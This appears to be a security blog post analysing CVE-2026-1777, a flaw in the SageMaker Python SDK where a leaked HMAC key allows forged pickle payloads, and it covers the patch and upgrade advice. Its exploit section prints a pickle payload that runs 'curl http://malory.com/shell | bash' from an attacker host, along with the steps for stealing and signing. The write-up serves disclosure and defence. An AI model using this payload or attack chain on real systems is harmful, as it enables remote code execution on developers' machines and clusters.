CVE-2026-1777

SageMaker's Open Secret: How a Helper Function Became a Backdoor

Alon Barad

Software Engineer

Feb 3, 2026·6 min read·13 visits

PoC Available

Executive Summary (TL;DR)

The SageMaker Python SDK passed its integrity secret key as a cleartext environment variable. Anyone with 'DescribeTrainingJob' permissions could read the key, forge malicious serialized objects, and execute code on the training cluster or the developer's laptop.

A critical design flaw in the Amazon SageMaker Python SDK allowed for Remote Code Execution (RCE) via insecure handling of cryptographic secrets. The SDK's 'remote function' capability, designed to offload local Python code to AWS training clusters, utilized a HMAC integrity check to sanitize serialized payloads. However, the secret key for this check was transmitted as a cleartext environment variable, accessible via standard AWS APIs. This allowed attackers with moderate privileges to forge malicious pickle payloads, achieving code execution both on the AWS training infrastructure and potentially on the victim developer's local machine.

Attack Flow Diagram

The Hook: Convenience at a Cost

In the world of MLOps, laziness is a virtue. The Amazon SageMaker Python SDK introduced a brilliant feature called the @remote decorator. Its promise was simple: write a function on your laptop, slap a decorator on it, and the SDK automatically serializes it, ships it to a massive GPU cluster in the cloud, runs it, and brings the results back to you. It's magic.

But as any security researcher knows, 'magic' usually involves pickle. Serializing code and executing it remotely is inherently dangerous. To make this 'safe', the AWS engineers implemented an integrity check. They didn't want just anyone modifying the code in transit (stored in S3) and having the training job execute it.

So, they decided to sign the payload using an HMAC (Hash-Based Message Authentication Code). Conceptually, this is the right move. You encrypt the hash of the data with a secret key. If the data changes or isn't signed by the key, the execution fails. It’s like a wax seal on a letter. The problem wasn't the lock; it was where they left the key.

The Flaw: Secrets in Plain Sight

Here is the architectural blunder: The SDK generated a REMOTE_FUNCTION_SECRET_KEY to sign the pickled payload. This key needs to exist in two places: the client (your laptop) to sign the code, and the remote worker (the SageMaker container) to verify it.

To get the key into the container, the SDK passed it as an environment variable to the SageMaker Training Job. In the cloud world, this is the equivalent of taping your spare house key to the front door. Why? because the AWS API DescribeTrainingJob returns the full configuration of a job, including the environment variables, in cleartext.

This meant that the 'secret' wasn't secret at all. Any user or role with sagemaker:DescribeTrainingJob permission—a very common, low-sensitivity permission often granted to developers, auditors, and CI/CD pipelines—could query the API, read the environment variables, and walk away with the HMAC key. The integrity check was reduced to security theater.

The Code: Autopsy of a Leak

Let's look at the implementation logic that caused this. In the vulnerable versions (SDK < 3.2.0), the serialization logic relied on Python's hmac library. The _perform_integrity_check function took the payload and a secret key, hashed them, and compared the result.

The real smoking gun was in how the job was configured. The SDK automatically injected the key into the environment:

# Vulnerable Logic (Pseudo-code representation)
secret_key = secrets.token_hex(32)
job_env = {
    'REMOTE_FUNCTION_SECRET_KEY': secret_key,  # <--- The leak
    'OTHER_VARS': '...'
}
sagemaker_client.create_training_job(
    Environment=job_env,
    ...
)

The fix, applied in commit fb0d789, is drastic. They didn't just hide the key; they deleted the concept of the key entirely. The engineers realized that there is no secure way to pass a shared secret through the control plane without setting up complex Key Management Service (KMS) logistics that would break the user experience.

The patch replaces the HMAC check with a simple SHA256 hash. Now, the SDK verifies that the file wasn't corrupted in transit, but it no longer cryptographically verifies the author. They shifted the security model from "Application Layer Integrity" to "Infrastructure Layer Access Control" (i.e., relying on S3 permissions).

# Patched Logic in serialization.py
# - hmac_key = os.environ.get("REMOTE_FUNCTION_SECRET_KEY")
# - if not hmac.compare_digest(digest, actual_digest):
# + digest = hashlib.sha256(data).hexdigest()
# + if digest != actual_digest:

The Exploit: From API Read to RCE

This vulnerability offers a textbook "Pivot" scenario. We start with Read access and escalate to Remote Code Execution. Here is how an attacker, let's call him "Malory", exploits this.

Step 1: Reconnaissance Malory has access to the AWS CLI. He lists training jobs and describes one that looks active or recently completed: aws sagemaker describe-training-job --training-job-name target-job-123

In the JSON output, buried under Environment, he finds: "REMOTE_FUNCTION_SECRET_KEY": "deadbeef1234..."

Step 2: Weaponization Malory creates a Python script using the pickle module. He defines a class with a __reduce__ method that executes a reverse shell when deserialized.

import pickle
import os
class Malicious(object):
    def __reduce__(self):
        return (os.system, ('curl http://malory.com/shell | bash',))
payload = pickle.dumps(Malicious())

Step 3: Signing the Bomb Using the stolen key deadbeef1234..., Malory calculates the HMAC-SHA256 of his payload. He updates the metadata.json file associated with the job to include this new valid signature.

Step 4: Delivery Malory uploads his poisoned payload.pkl and metadata.json to the S3 bucket defined in the training job's output path. He needs s3:PutObject permissions for this, but if the bucket is shared or permissions are lax (common in data science orgs), this is trivial.

Step 5: Detonation This is the nasty part. The code executes in two possible places:

The Server: If the training job is still initializing, the SageMaker container pulls the payload, verifies the signature (it matches!), deserializes it, and the cluster is compromised.
The Client (Worse): If the job is finished, the unsuspecting data scientist runs job.result() on their laptop. The SDK pulls the (now malicious) artifacts from S3, verifies the signature, unpickles the data, and boom—Malory now has a shell on the developer's laptop inside the corporate VPN.

The Impact: Breaking the Trust Boundary

The severity of CVE-2026-1777 lies in the trust boundary violation. Developers treat SageMaker as a trusted execution environment. They assume that artifacts created by their own jobs are safe. This vulnerability inverts that trust.

By compromising the integrity mechanism, an attacker turns the SageMaker SDK into a lateral movement tool. Access to S3 and DescribeTrainingJob is usually considered "Data Plane" access, not "Admin" access. However, via this exploit chain, those permissions are elevated to arbitrary code execution on any machine that interacts with that job.

Furthermore, because the secret was exposed in the API response, it is likely logged in CloudTrail (if data events are enabled) or third-party monitoring tools, meaning the keys to the kingdom might be sitting in your Splunk logs right now.

The Fix: A Hard Reset

Amazon's response was swift and decisive. They didn't try to patch the leak; they removed the pipe. By eliminating the REMOTE_FUNCTION_SECRET_KEY entirely, they acknowledged that the environment variable transmission vector was fundamentally unsafe for high-value secrets in this context.

How to patch: Update your sagemaker python package immediately.

For V3 users: Upgrade to >= 3.2.0
For V2 users: Upgrade to >= 2.256.0

Post-Patch Reality: With the HMAC gone, the SDK now relies solely on S3 bucket policies. This means if an attacker can write to your S3 bucket, they can replace the code, and the SDK will happily execute it (checking only a simple SHA hash for corruption, not tampering). Therefore, S3 Write permissions are now effectively equivalent to RCE permissions for SageMaker users. Audit your bucket policies accordingly.

Official Patches

AWSCommit fixing the issue in V3

Fix Analysis (2)

Technical Appendix

CVSS Score

7.2/ 10

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Affected Systems

Amazon SageMaker Python SDK (v2 < 2.256.0)Amazon SageMaker Python SDK (v3 < 3.2.0)MLOps Pipelines utilizing @remote decorator

Affected Versions Detail

Product	Affected Versions	Fixed Version
sagemaker Amazon Web Services	< 3.2.0	3.2.0
sagemaker Amazon Web Services	< 2.256.0	2.256.0

Attribute	Detail
CWE ID	CWE-312 (Cleartext Storage of Sensitive Information)
Attack Vector	Network (API & S3)
CVSS v3.1	7.2 (High)
Impact	Remote Code Execution (RCE)
Authentication	Required (AWS IAM)
Exploit Status	PoC Possible (Logic is public)